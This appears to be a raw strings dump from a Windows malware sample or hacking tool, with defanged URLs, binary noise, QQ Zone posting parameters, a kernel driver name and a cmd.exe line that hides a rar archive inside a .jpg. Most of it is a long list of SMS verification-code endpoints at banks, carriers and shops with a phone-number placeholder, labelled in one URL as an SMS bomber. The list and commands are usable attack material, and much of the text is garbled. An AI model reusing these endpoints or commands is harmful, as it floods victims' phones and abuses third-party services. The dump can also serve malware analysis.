&ref=qzone&json=1&inCharset=gbk&outCharset=gbk&format=fs&iNotice=1&secverifykey=28Q12062369671816_
&cateName=¸öÈËÈÕ¼Ç&rightType=1&force=1&source=34&g_tk=
&page=1&refererurl=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&ref=qzone&v6=1&uin=
&styledm=cnc.qzonestyle.gtimg.cn&imgdm=cnc.qzs.qq.com&bdm=b.cnc.qzone.qq.com&mode=2&numperpage=15&blogseed=0.9366331722068764&property=GoRE×tamp=1360912348&dprefix=cnc.&g_tk=
&blogid=
qzreferrer=http://b1.cnc.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
taskmgr.exe
hXXp://tool.114la.com/shouji/
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
hXXp://blog.sina.com.cn/s/blog_60d641410101k1t9.html
10/05/12
\.YVV
Ï[H
L <
e1.jpg
hXXp://tieba.baidu.com/f/search/res?ie=utf-8&kw=&qw=
\zlib1.dll
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
MSVCRT.dll
WSOCK32.dll
VERSION.dll
zlib1.dll
<fd:%d>
221.238.24.116
mswsock.dll
1#2-2D2Q2m2r2}2
> >$>(>,>0>4>8><>@>
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
"1.2.3
%c%c%c%c%c%c%c%c%c%c
inflate 1.2.3 Copyright 1995-2005 Mark Adler
MSVCR90.dll
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
MSVCR71.dll
\*.jpg
hXXp://my.poco.cn/album/album_uploader.php
Content-Disposition: form-data; name="redirect_url"
hXXp://my.poco.cn/album/album_items_edit_t_y.php?redirect_url=&op=edit&item_ids[]=%item_id%
imgup-s.poco.cn/ultra_upload_service/upload.mypoco_items.php
hXXp://my.poco.cn/album/album_items_edit_t_y.php?redirect
hXXp://my.poco.cn/album/album_details_text.php?_admin_login&item_id=
nopass;
\ICO.ICO
\KillQQLiveAD\Config.ini
hXXp://ssl.qkm.cc/ceshi/mmsgb.php?qq=
\LNRSPEEDUP.sys
\\.\LNRSPEEDUP
h.rdata
H.data
.JinFu0
`.rsrc
@.JinFu1
`.JinFu2
.reloc
ntoskrnl.exe
M-bP}
HAL.dll
@.ELC43
hal.dll
\y%c:
.gXGn{
w%F<i
7Z%sQ
<9H%D
.JMHb jDqHS
K*l|:.HaH}8B:
.fi}-
?l.TxD
[.hj-F
Z.fFKd
.puty
.on~'_
L.Izk
h=%C\`
7;:`<$?:?
hXXp://tieba.baidu.com/
hXXp://yy.duowan.com/go.html#
hXXp://yy.com/#
p.PutRSInfo uin, 65542, strRSPrompt, strRSParam
QQDownload.exe
\1.zip
XFSKin/about_banner.png
.xtFiJ
XFSKin/blank_history.png=z
}<}h%d;C
XFSKin/blank_recent.pngmYu\TO
}.LK"
yn%d:
XFSKin/config_split_line.png}S=
Z.KRE*e
XFSKin/config_tab_bk.png
#.JSk
XFSKin/face_img_separator.png
XFSKin/fillet.png
XFSKin/help_seperator.png}S=l
XFSKin/list_bk.png
XFSKin/list_item_hover.png
XFSKin/loading.png%Wy<
XFSKin/loading_bk.png
XFSKin/menu_bk_droplist.png}SMh
XFSKin/menu_seperator.png}SM
XFSKin/newtask_toolbar_shadow.png}SM
XFSKin/offline_list_bk.png
XFSKin/pic_file_bk.png
XFSKin/point_panel.png
/?=.PC
XFSKin/question.png}ww4
XFSKin/scrollbar_bk.png
XFSKin/search_edit_bk.png
XFSKin/skin_bk_sea.jpg
XFSKin/skin_button0.png
XFSKin/skin_button1.png
XFSKin/skin_button2.png
XFSKin/skin_button3.png
Q.aDZOF
XFSKin/skin_button4.png
XFSKin/skin_button5.png
XFSKin/splash_acc.png
.RcR?
XFSKin/splash_browse.png
XFSKin/splash_bxbo.png
XFSKin/splash_retry.png
XFSKin/statusbar_bk.png
XFSKin/tabDown.png}SA
XFSKin/tabHover.png}S
XFSKin/task_pause.png
XFSKin/tips_bk.png
XFSKin/toolbar_separator.png
XFSKin/top_toolbar_bk.png
XFSKin/top_toolbar_shadow.png
XFSKin/blank_history.png
XFSKin/blank_recent.png
XFSKin/config_split_line.png
XFSKin/help_seperator.png
XFSKin/loading.png
XFSKin/menu_bk_droplist.png
XFSKin/menu_seperator.png
XFSKin/newtask_toolbar_shadow.png
XFSKin/question.png
XFSKin/tabDown.png
XFSKin/tabHover.png
\XFSKin\bottom_toolbar_bk.png
ha.peid
mrbin\BT.torrent
cmd.exe /c %temp%\mrbin\rar.exe a -y %temp%\mrbin\BT.rar %temp%\mrbin\BT.torrent
cmd.exe /c copy /b %temp%\mrbin\
.jpg   %temp%\mrbin\BT.rar %temp%\mrbin\BT
mrbin\BT.rar
hXXp://VVV.liantu.com/api.php?bg=
hXXp://m.qzone.qq.com/cgi-bin/new/pass_unverify?g_tk=
qzreferrer=http://ctc.qzs.qq.com/qzone/msgboard/auditing.html&hostUin=
2012AU.5D6D.NET
hXXp://s134.sl.qq.com/s/index.alc
hXXp://sl.qq.com/act/a20110304dltb/index.htm
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
hXXps://VVV.yypt.com/finance/regist!sendValidateCode.do?mobile=###########
hXXps://VVV.firstp2p.com/user/MCode/?type=1&isrsms=0&t=1407124856875&mobile=###########
hXXps://user.95516.com/uc-cdhd-web/rest/reg/sendmobilecaptcha/?mobile=###########&msgType=01
hXXps://security.9666.cn/register/sendPhoneCodeAjax.action?phone=###########
hXXps://register.shengpay.com/personal/sendRegisterSms.htm/?mobile=###########
hXXps://passport.m.jd.com/user/getCode.json?&mobile=###########&sid=5c27553bd5524170c515edd6ffba88fa
hXXps://passport.m.jd.com/user/getCode.action?mobile=###########&sid=5c27553bd5524170c515edd6ffba88fa
hXXps://passport.m.jd.com/user/getCode.action?mobile=###########&sid=182328dc09ecd4eee908708e0bfd5496
hXXps://passport.jd.com/emReg/sendMobileCode?mobile=###########&r=0.9010949897739119
hXXps://passport.jd.com/emReg/isMobileEngaged?mobile=###########&r=0.08241349037594953
hXXps://passport.bankcomm.com/ajax.php/?a=sendvcode&uname=###########®binding=0
hXXps://member.88.com.cn/user/getmobilecode.html/?ac=send&mobile=###########
hXXps://caiyun.feixin.10086.cn/Mcloud/sso/sendmsms.action/?
hXXps://aq.99.com/AjaxAction/AC_register.ashx?url=hXXp://VVV.99.com/?action=createcodeofmobileregister&txtUserNameOfMobile=###########
hXXps://aq.99.com/AjaxAction/AC_register.ashx/?action=verifyusernameofmobile&txtUserNameOfMobile=###########
hXXp://zhoukou.baixing.com/oz/voice/?mobile=###########
hXXp://zhoukou.baixing.com/oz/verify/x/reg?mobile=###########
hXXp://zhoukou.baixing.com/c/ic/voiceCode
hXXp://zhengzhou.baixing.com/oz/voice/?mobile=###########
hXXp://zhengzhou.baixing.com/oz/verify/x/reg?mobile=###########
hXXp://zg51.net/web/register_up.asp/?mobile=###########&password=qweasda&tj_custid=0&verify=e33fe4723f457dee
hXXp://z6.cnzz.com/stat.htm?id=1000404568&r=http://VVV.80x08.com/sms1/&lg=zh-cn&ntime=none&cnzz_eid=521679664-1410980575-http://VVV.80x08.com/&showp=1301x731&t=网页短信轰炸机-在线短信轰炸机-免费...&h=1&rnd=2000467422
hXXp://z6.cnzz.com/stat.htm?id=1000404568&r=http://buyaofengwo.duapp.com/dx/&lg=zh-cn&ntime=1410980493&cnzz_eid=none&showp=1301x731&t=&h=1&rnd=404511915
hXXp://VVV.zsye.com/applyServlet/?userid=637810&opretype=2&sourceName=GW&isHOME=try.jsp&phone=###########&isphone=###########&babyBirthday=20140102
hXXp://VVV.ximalaya.com/passport/mobile/getVerifyCode/?msgType=4&phone_num=###########
hXXp://VVV.quxinwang.com/Codes/Register.aspx?&_=1407633645592&tag=getcode&un=###########
hXXp://VVV.lecai.com/user/ajax_register_phone_authcode_send.php?phone=###########
hXXp://VVV.kuaiyoujia.com/Register/GetVerificationCodeOnRegist/?mobile=###########
hXXp://VVV.jumei.com/i/account/ajax_send_sms_for_mobile_register?mobile=###########
hXXp://VVV.guahao.com/validcode/json/mobile/###########/REG_MOBILE/ec526aca3bdf5a81dd8d96ad521134da?_=1403700491564
hXXp://VVV.guahao.com/validcode/json/mobile/###########/REG_MOBILE/cebaf071614ac29f9ad6c692b474a46f?_=1366925898545
hXXp://VVV.guahao.com/user/json/existloginid/###########?_=1403700491106
hXXp://VVV.epicc.com.cn/ecar/proposal/checkmobile/?addCheckValuesFlag=&areaCode=11000000&mobile=###########&citySelect=11000000&proSelectedtext=北京&citySelectedtext=北京&cooperator=&next=0.3737380872480571
hXXp://VVV.epicc.com.cn/ecar/followup/callBack/saveCustomerToHF?time=1407125058704/?CallBack.mobile=###########&CallBack.customerCName=李&CallBack.priority=0&CallBack.areaCode=11000000&IsblackFlag=0&addCheckValuesFlag=0&ccaFlag=0&cityCode=11000000&proposalFinished=false&next=0.37693149223923683
hXXp://VVV.elong.com/home/isajax/ElongNewIndex/SendAppSMS?_=1405613807723&mobile=###########
hXXp://VVV.ccb-life.com.cn/lifeebiz/view/management/userRegister.jsp/?mobile=###########&_action=sendValidationCode
hXXp://VVV.ccb-life.com.cn/lifeebiz/view/management/userRegister.jsp/?mobile=###########&_action=checkMoblie
hXXp://VVV.500.com/wap/ajax.php?tel=###########&act=md&jsonpcallback=jsonp1407076681822
hXXp://VVV.36936.com/handler/RegUserSendSms.ashx?&type=1&mobile=###########
hXXp://VVV.169money.com/AjaxWeb/GetCode.ashx?0.4810091208200902/?Tel=###########
hXXp://VVV.169money.com/AjaxWeb/AddBmFailure.ashx?0.36719161039218307/?UserName=&UserTel=###########&UserPwd=dj1818&Code=&Card=&Grade=1&Default=&PageName=%u4EA4%u6613%u8F6F%u4EF629&Operation=%u514D%u8D39%u4E0B%u8F7D&Typaes=129
hXXp://weburs.ku.163.com/quickReg/sendMobileCaptcha?promark=ab47ge1s&id=null&output=json&m_username=###########&callback=jQuery16409621100642252713_1407483945550&_=1407483959565
hXXp://weburs.ku.163.com/quickReg/sendMobileCaptcha?promark=31j8lmq9&id=null&output=json&m_username=###########&callback=jQuery16405770837608724833_1407483725809&_=1407483776680
hXXp://w.sohu.com/t2/tologin.do?mnd=###########&qr=1
hXXp://v1.cnzz.com/z_stat.php?id=1000404568&web_id=1000404568
hXXp://u.tieyou.com/api/user.html?act=checkMobileAccount&mobile=###########
hXXp://u.tieyou.com/api/user.html/?act=checkMobileAccount&action=u.user&mobile=###########
hXXp://sso.letv.com/user/mobileRegCode/mobile/=###########/mobilecodeletvid/
hXXp://sso.letv.com/user/mobileRegCode/mobile/###########/mobilecodeletvid/k961601363512388
hXXp://sso.letv.com/user/mobileRegCode/mobile/###########/mobilecodeletvid/f219111395819034
hXXp://sso.letv.com/user/mobileRegCode/mobile/###########/mobilecodeletvid/c326961366927138
hXXp://sso.letv.com/user/mobileRegCode/mobile/###########/mobilecodeletvid/
hXXp://sso.letv.com/user/checkMobileExists/mobile/###########?jsonp=jQuery17103937588292174041_1405268556755&_=1405268598815
hXXp://sso.letv.com/user/checkMobileExists/mobile/###########?jsonp=jQuery17103937588292174041_1405268556754&_=1405268579859
hXXp://sso.letv.com/user/checkMobileExists/mobile/###########?jsonp=jQuery171008569038612768054_1402390605865&_=1402390613618
hXXp://shenzhen.lashou.com/ajax/signmobile.php?act=send_code&bind_mobile=###########
hXXp://shenzhen.lashou.com/ajax/signmobile.php?act=checkmobile&mobile=###########
hXXp://reg.ztgame.com/registe/sendMobileCode/?check=&phoneNum=###########
hXXp://pub.idqqimg.com/wpa/images/group.png
hXXp://pim.10086.cn/ajax/mt.php/?
hXXp://passport.sohu.com/user/tologin
hXXp://passport.sohu.com/regist/send_sms/?mobile=###########
hXXp://passport.115.com/?ct=ajax&ac=ajax_smscode&_token=1c3bcfwLc1rPQtERvs4h5Ejb1klfGnFca8T0FGY5BvexelJ2opj4ZxzsWAeTvQyI8VmdNziXlGSA&m=###########
hXXp://passport.115.com/?ct=ajax&ac=ajax_register_validate?[mobile]=###########&_=1407482013965
hXXp://passport.115.com/?ct=ajax&ac=ajax_chekuser&account=113281116967&type=mobile&val=###########&_=1407482070487
hXXp://passport.115.com/404.html
hXXp://new.i139.cn/umswx/xyyx/sendAndSmsCode.do?phonenum=###########&xf=json
hXXp://my.tv.sohu.com/user/reg/getmstatus.do?passport=###########
hXXp://my.51job.com/AjaxAction/mobile_code/send_mobile_code.php/?mobile=###########&apptype=4
hXXp://mnote.weibo.10086.cn/AppServer/api/getDyncPasswd.do/?{"username":"###########"}
hXXp://member.88.com.cn/user/getmobilecode.html/?ac=send&mobile=###########
hXXp://m.qichetong.com/AuthenService/register/Ajax/GetCode.ashx?t=1&txtLoginName=###########&r=0.41990769281983376
hXXp://m.qichetong.com/AuthenService/register/Ajax/GetCode.ashx?t=1&txtLoginName=###########&r=0.0194694004021585
hXXp://m.passport.sohu.com/r/sendMVcodeaa?mobile=###########
hXXp://m.passport.sohu.com/r/mobile?mobile=###########&password=asdfghjkiu&agree=true
hXXp://m.ctrip.com/html5/ClientData/SendVerifyCode/###########
hXXp://m.ctrip.com/html5/Account/UserRegister/?UID=###########&Password=0e831a33923e4725ee279f645ffb717ae4d011f9a19e1c4252027741156d135f6c58737223feab36bac4e3a1a434c52a3b7395d01e5f68ca81a6e0c8215601c1fe5b1eaa53db6fb23f3cc09338438a50a25c9e3f50a02574df233c8a313c634c9c50aaa88f1b6d2ef679aa3a53638d8ac9fa46354d16927e253f7c44970fa3e2&Sales=&SourceId=
hXXp://m.51job.com//ajax/in/getphonecode.ajax.php?phone=###########&type=5
hXXp://m.10086.cn/wireless/jsp/N/migu/n/regVip.jsp/?action=submitMobile&k=002000A&sch=&lran=eXMDuZ&pageid=W1P1$2107818S2R2L1&mobile=###########
hXXp://lxbjs.baidu.com/float/_c.js?vtel=###########&siteid=4882386&bdcbid=e63c8936-55d6-4d23-9046-d28550cf2f5d&code=E0F7B4FACD65AA17859DBBEA70811673ED3E72AAF845B28CE932C0B27C93E9D6672119895F9A72806F03512459789F986A08049390A06C3B494320DA607CFCE70C8CC66A82FBE41C21242BBCC526AD52A18DEFF09E8AF158E37BBF0CE925562D&t=1407485335002&callback=_lxb_jsonp_hyl8ff16_
hXXp://login.tudou.com/passport/sendSmsMsg.do?jsoncallback=jQuery17209491650222335011_1407073475324&type=0&mobile=###########&_=1407073499462
hXXp://id.ourgame.com/passport!exist.do?passport=###########&_=1407483677524
hXXp://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=###########
hXXp://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx/?r=0.3434412432940654&popType=&LoginName=###########
hXXp://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx/?popType=0&r=0.8167970664799213&LoginName=###########
hXXp://i.360.cn/smsApi/sendsmscode?account=###########&condition=2&r=0.9476780155673623&callback=QiUserJsonP1407482642243
hXXp://hwid1.vmall.com:8080/oauth2/oauth2/ajaxHandler_in/getMobileValiCode?mobile=008613281116967&smsReqType=4&session_code_key=p_reg_phone_session_ramdom_code_key&reqClientType=26&pageToken=xdwMu5EeUPC7xkKLdHWcsdSFxZg8TxYC&lang=zh&reflushCode=0.9925481270270826
hXXp://gwpassport2.woniu.com/v2/sendsms_h9fp972k?jsoncallback=jQuery17209502564975991845_1407483940698&mobile=###########&_=1407484002669
hXXp://download.feixin.10086.cn/download/downloadFLToMobile.action?id=50&no=###########&isCheckCode=1
hXXp://data.zgzcw.com/newzgzcw/sendMessage.jsp?mobile=###########&callback=jQuery171007485370174981654_1407076493305&_=1407076509842
hXXp://crm.ws.ctrip.com/Promotion/sms/JsonpSendSMS.ashx?tel=###########&type=C27&detailId=-1&callback=Floating.MsgRp&rd=0.2406133026815951hXXp://crm.ws.ctrip.com/Promotion/sms/JsonpSendSMS.ashx?tel=###########&type=C27&detailId=-1&callback=Floating.MsgRp&rd=0.2406133026815951
hXXp://cn.ae.aliexpress.com/wsuser/join/SmsSenderAjax.htm/?mobileNo=###########&_csrf_token_=m6bptqecyqv0&t=1407484167337
hXXp://cbc.iuoooo.com/Register/GetAuthCode/?
hXXp://c.cnzz.com/core.php?web_id=1000404568&t=z
hXXp://buyaofengwo.duapp.com/dx/sms.php?phone=###########&t=65000&time=1&process=100
hXXp://buyaofengwo.duapp.com/dx/JS.js
hXXp://buyaofengwo.duapp.com/dx/
hXXp://buyaofengwo.duapp.com/csshide1.css
hXXp://buyaofengwo.duapp.com/abprule.css
hXXp://ac.ppdai.com/validatecode?callback=jQuery17108819785887872924_1407124610768&ValidateType=Mobile&MobilePhone=###########&_=1407124716359
hXXp://713hzj.jifenqiang.com/account/getVerifyCode?phone=###########
hXXp://3g.51job.com/my/register.php?topage=3&verify_param=74eaa3ff5a1ede46f2d98d8b393be1f3&phone=###########&submit=1&time=1407074694
hXXp://3g.51job.com/my/register.php/?phone=###########&submit=1&verify_param=7a8654f998c7608fb56e80e0f8a44ad3
hXXp://3g.500.com/api/sendcode?mobilenum=###########
hXXp://218.28.199.137/m/mobile/registerSms/?mobile=###########
hXXp://218.206.191.106/idm/usermgr/usernameCheck?mobilePhone=###########
hXXp://218.200.227.123/order/cmnet/goto_validate_code/?msisdn=###########
hXXp://211.152.60.227:8029/Api/index.php/Member/registerValidateCode/?phone=###########
hXXp://211.136.93.21/hfwebbusi/pay/saveOrder.do?mobileId=###########
hXXp://180.168.178.213:8888/MemberMag.asmx/SendVeCode?sob_password=d5299c2fe78d75a37b0d3f4715d678bb&sob_code=79388bb8a33bbe3d403d7e76d6d12d24&sob_hotelgroup_id=8d5e957f297893487bd98fa830fa6413&phoneNum=###########&act=0
hXXp://114.112.174.170/serviceCor/regfirst.action?mobile=###########
hXXp://111.1.37.36:8686/link_smssend.asp?username=wzysba&password=wzysba&mobile=###########&content=ÄúµÄ×¢²áÑéÖ¤ÂëÊÇ:476948&sendtime=
hXXp://VVV.clicki.cn/refer/track_proxy?rf=dw5fr09wx1&tt=1&data={"site_id":49735,"session_id":"1410981008779994","flow_id":4,"type":1,"customs":[],"actions":[{"id":"1","f":1,"c":[]}]}
hXXp://junzhe.phpnet.us/index.php?hm=###########&c=1
hXXp://wpa.qq.com/pa?p=2:1073841652:51
hXXp://member.1688.com//member/ajax/send_identity_code_by_mobile.do?callback=jQuery172007067019236274064_1376100939244&mobile=###########&area=86&isBizMobile=true
hXXps://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=+86###########&operation=start&ts=1376044348191
hXXp://authleqr.sdo.com/lars/send-login-validate-code.jsaonp?callback=jQuery16206594030656120524_1341237419373&userId=###########
hXXp://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=135&userid=###########
hXXps://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=+86###########&operation=start&ts=1376099658512
hXXp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=24-bit&ds=1301x731&ep=16265,14490&et=3&fl=15.0&ja=1&ln=zh-CN&lo=0<=1410981070&nv=0&rnd=527396514&si=64c023bbf11ff5c065c8edb48530e593&st=4&su=http://junzhe.phpnet.us/&v=1.0.64&lv=2
hXXp://i.360.cn/smsApi/sendsmscode?account=###########&condition=2&r=0.8326570473673853&callback=QiUserJsonP1354551431282
hXXps://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=+86###########&operation=start&ts=137606625123
hXXp://passport.cnyw.net//ajax.php?action=getverify&mobile=###########
hXXp://VVV.kunlun.com/?act=ajax.registGetMobileCode&mobile=###########&type=regist
hXXp://VVV.vko.cn/sendmobile.html?phone=###########&{}&_=1355879411734
hXXp://VVV.66call.com/register.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTYzNzEwOTYxOA9kFgJmD2QWDAIFDw8WAh4EVGV4dAULMTU5NTAxMjgwMzZkZAIHDw8WBh8ABQblj6/nlKgeCENzc0NsYXNzBQ5yX2NfY19yX2NoZWNrMR4EXyFTQgICZGQCDQ8PZBYCHgV2YWx1ZQUJamlhbmdsaWxpZAIPDw8WBh8ABQbpgJrov4cfAQUOcl9jX2Nfcl9jaGVjazEfAgICZGQCEQ8PZBYCHwMFCWppYW5nbGlsaWQCEw8PFgYfAAUG6YCa6L+HHwEFDnJfY19jX3JfY2hlY2sxHwICAmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uMoC6NmiwUtO9MaSDo+blDqWjloj5&txtact=###########&hidfoc=&hidisOk=1&txtpwd=jianglili&txtrepwd=jianglili&txtcode=&ImageButton1.x=59&ImageButton1.y=11
hXXp://pub.idqqimg.com/qconn/wpa/button/button_111.gif
hXXps://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=+86###########&operation=start&ts=###########
hXXp://register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=###########
hXXp://wap.easou.com/sms.e?name=蓝蓝天空&mobile=###########&action=sms&usid=9&
hXXp://VVV.gewara.com/ajax/mobile/register.xhtml?mobile=###########&captchaId=&captcha=
hXXp://VVV.66call.com/register.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTYzNzEwOTYxOA9kFgJmD2QWDAIFDw8WAh4EVGV4dAULMTU5NTAxMjgwMzZkZAIHDw8WBh8ABQblj6/nlKgeCENzc0NsYXNzBQ5yX2NfY19yX2NoZWNrMR4EXyFTQgICZGQCDQ8PZBYCHgV2YWx1ZQUJamlhbmdsaWxpZAIPDw8WBh8ABQbpgJrov4cfAQUOcl9jX2Nfcl9jaGVjazEfAgICZGQCEQ8PZBYCHwMFCWppYW5nbGlsaWQCEw8PFgYfAAUG6YCa6L+HHwEFDnJfY19jX3JfY2hlY2sxHwICAmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uMoC6NmiwUtO9MaSDo+blDqWjloj5&txtact=###########&hidfoc=&hidisOk=1&txtpwd=zhasini&txtrepwd=zhasini&txtcode=&ImageButton1.x=59&ImageButton1.y=11
hXXp://wap.dm.10086.cn/X/o/3455101/447117/mva0?a=/enduser/querySMSValiCodeByWap20.action&templateDir=template&theme=simple&name=querySMSValiCode&id=querySMSValiCode&downId=&operateType=1&isPass=true&user.accountName=###########&Submit=下一步
hXXp://a.10086.cn/pams2/s/s.do?c=204&j=l&lpt=1&mobile=###########&p=72
hXXp://read.10086.cn/www/firstpage/getValidateCode.action?phone=###########&sf=0
hXXp://read.10086.cn/www/NiceNameAjax?msisdn=###########&e_cm=cmmobile
hXXps://cmpay.10086.cn/service/send_chk_no.xhtml?REG_MBL_NO=###########&SMS_CD=URM001&typ=Y&r=0.9636801626045905
hXXps://feixin.10086.cn/account/RegisterLv3Ajax?stype=m&stext=###########
hXXp://my.feixin.10086.cn/password/findpasswordvalidate?type=0&account=###########
hXXp://VVV.cmread.com/www/firstpage/getValidateCode.action?phone=###########&sf=0
hXXp://go.10086.cn/index.do?method=doReg&mobile=###########&source=reg
hXXp://VVV.cmread.com/www/NiceNameAjax?msisdn=###########&e_cm=cmmobile
hXXp://VVV.keepc.com/registerForMobileForCode.act?mobileNo=###########
hXXp://wap.cmread.com/sso/oauth2/msisdnRegister?e_l=1&f=7718&pg=221&msisdn=###########&passwd=1415926
hXXps://VVV.cmpay.com/service/send_chk_no.xhtml?REG_MBL_NO=###########&SMS_CD=URM001&typ=Y&r=0.9636801626045905
hXXp://shoujibao.net/pams2/m/s.do?j=l&c=31879&p=73&mobile=###########&password=1415926
hXXp://club.service.autohome.com.cn/Ashx/CreateMobileCode.ashx?mobile=###########
hXXp://VVV.huggieshappyclub.com/Handler/Vcode.ashx?mobile=###########
hXXp://my.feixin.10086.cn/password/find/?usernotexist
hXXp://wap.buidq.com/wap/webcallService.aspx?tel=###########
hXXp://VVV.uwewe.com/get/IsUser.aspx?phone=###########&quhao=86
hXXp://VVV.uwewe.com/get/SendMessage.aspx?phone=###########&ccode=86&type=1
hXXp://VVV.66call.com/forgetpwd.aspx?ScriptManager1=UpdatePanel1|ImageButton2&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExMjY2ODE5MTgPFgYeCFRpbWVTcGFuBqpmMwD38M+IHgRjb2RlBQQ0MjY1HgRhY2N0BQsxNTgzODgwMjA0MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjPdI0AXCiz2XIYks0CPZpmkSSEMDg==&txtacct=###########&txtcode=7426&txtpwd=&txtrepwd=&ImageButton2.x=76&ImageButton2.y=18
hXXp://VVV.wcall.net/ajax/send_captcha.jsp?mobile=86###########
hXXp://VVV.cmpassport.com/umcsso/notify?optype=10&sourceid=2&backurl=hXXp://my.feixin.10086.cn&check=C26A987E881BDFF698F00C36BD89B752
hXXp://VVV.uwewe.com/wap/reg.aspx?__VIEWSTATE=/wEPDwUKLTg3MDQ4MjcyNGRkTWAEkK5GOtWg8l1At7LuQLJsrtk=&__EVENTVALIDATION=/wEWBwLf79jTDQL7h7XWDwKd+7q4BwLinreAAgLChPzDDQK7q7GGCAKM54rGBiIS9Dt7i1j1h+DtH9EcyHIWJVZf&txtacct=###########&txtpwd=&txtRepwd=&txtCode=&Button2=语音获取验证码
hXXp://x.autoimg.cn/club/html/err.html
hXXp://VVV.gewara.com/checkMember.xhtml?tag=mobile&itemvalue=###########
hXXp://VVV.dianping.com/ajax/json/account/reg/mobile/send?m=###########
hXXp://VVV.ushi.com/openRegU!checkNumber.jhtml?basicProfile.mobile=###########
hXXp://VVV.efala.net/newfindpwbysms.flow?byname=###########
hXXps://VVV.cmpassport.com/umc/management/forgetpwd/mobile/reset/?from=2&sso_time=1410981076632
hXXp://zj.189.cn/zjpr/member/authentication/sendValidatePhone.html?phone=###########
hXXp://weibo.com/signup/v5/formcheck?type=mobile&value=###########&__rnd=1363496469546
hXXp://api.open.uc.cn/cas/register/mobi/resendVCode?uc_param_str=einisivelafrpf&client_id=20033&from=cas&mobi=###########
hXXp://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=###########&appId=www_home&v=1&v=1
hXXp://i.youku.com/u/bindMobile?__rt=1&__ro=&mobile=###########
hXXps://safe.renren.com/actions/changesafemobile/sendmobilecaptcha?ajax-type=json&token=1ZhR7iv65SgaNXliuA7mujgTO3s3k1CL&mobile=###########&requestToken=496404876&_rtk=e95787e6
hXXp://service.zol.com.cn/user/ajax/sendMsgCode.php?phone=###########
hXXps://login.vancl.com/login/BeginRegister.ashx?action=sendmobilecode&key=###########&validatecode=&_=1363498730859
hXXps://VVV.huggieshappyclub.com/Handler/Vcode.ashx?mobile=###########
hXXp://passport.eastmoney.com/chkphone.aspx?flag=check¶m=###########
hXXp://passport.eastmoney.com/chkphone.aspx?flag=resend¶m=###########
hXXp://passport.cntv.cn/mobileRegister.do?msisdn=###########&verfiCodeType=1&method=getRequestVerifiCode
hXXp://register.zhenai.com/register/validateMobile.jsps?mobile=###########
hXXp://reg.jiayuan.com/libs/xajax/reguser.server.php?processSendOrUpdateMessage&xajax=processSendOrUpdateMessage&xajaxargs[]=mobile=d$&xajaxargs[]=mobile&xajaxr=1363500615734
hXXps://member.suning.com/emall/SNCellPhoneRegisterCmd?actionType=reSendValCode&logonId=###########&URL=SNUserRegisterComfirmView&_=1363500974671
hXXp://account.iqiyi.com/security/secret/mobile/adm.action?time=1363501090218&mobile=###########
hXXp://VVV.skywldh.com/registerForMobileForCode.act?mobileNo=###########&smSecurityCode=
hXXp://wap.skywldh.com/index.php?register&flag=flag&phone=###########&mss=on
hXXp://zg51.net/web/customer/forgetPwd_up.asp?customermobile=###########&verify=01f735f97f1af959&checkcodeflag=1
hXXp://VVV.qqvoice.com/free/getExpCode.do?_isAjaxRequest=true&phonemail=###########&type=1&randvalue=
hXXp://VVV.feiin.com/findAccountInfoByAccount.act?mobile=###########
hXXp://wap.feiin.cn/index.php?register?phone=###########
hXXp://VVV.feiin.cn/bindMobileCode.act?account=###########&quhao=0086
hXXp://VVV.139talk.com/user/regnum.html?phone=###########&type=1&key=ofoedsv0oeg6aari1m3ig0nsc5
hXXp://VVV.huggies.com.cn/handler/vcode.ashx?mobile=###########
hXXp://VVV.139talk.com/invite/invitesms.html?phone=###########&key=ofoedsv0oeg6aari1m3ig0nsc5
hXXp://VVV.139talk.com/invite/regnum.html?phone=###########&type=1&key=ofoedsv0oeg6aari1m3ig0nsc5
hXXp://VVV.139talk.com/invite/register.html?p=cGhvbmV8MTU4Mzg4MDIwNDJ8Y2hrY29kZXw4OTczfGRhdGV8MjAxMy0wMy0xNw==
hXXp://VVV.139talk.com/download/smsdownload.html?popPhone=###########&phoneType=Iphone&popKey=ofoedsv0oeg6aari1m3ig0nsc5
hXXp://VVV.159talk.com/user/regnum.html?phone=###########&type=1&key=h5u9albk8oveqm17rfo6kvo226
hXXp://my.feixin.10086.cn/password/sendfindpasswordsms?MobileNo=###########
hXXp://f.10086.cn/im5/register/checkMobile.action?mobileNo=###########
hXXp://wcall.net/ajax/send_captcha.jsp?mobile=86###########
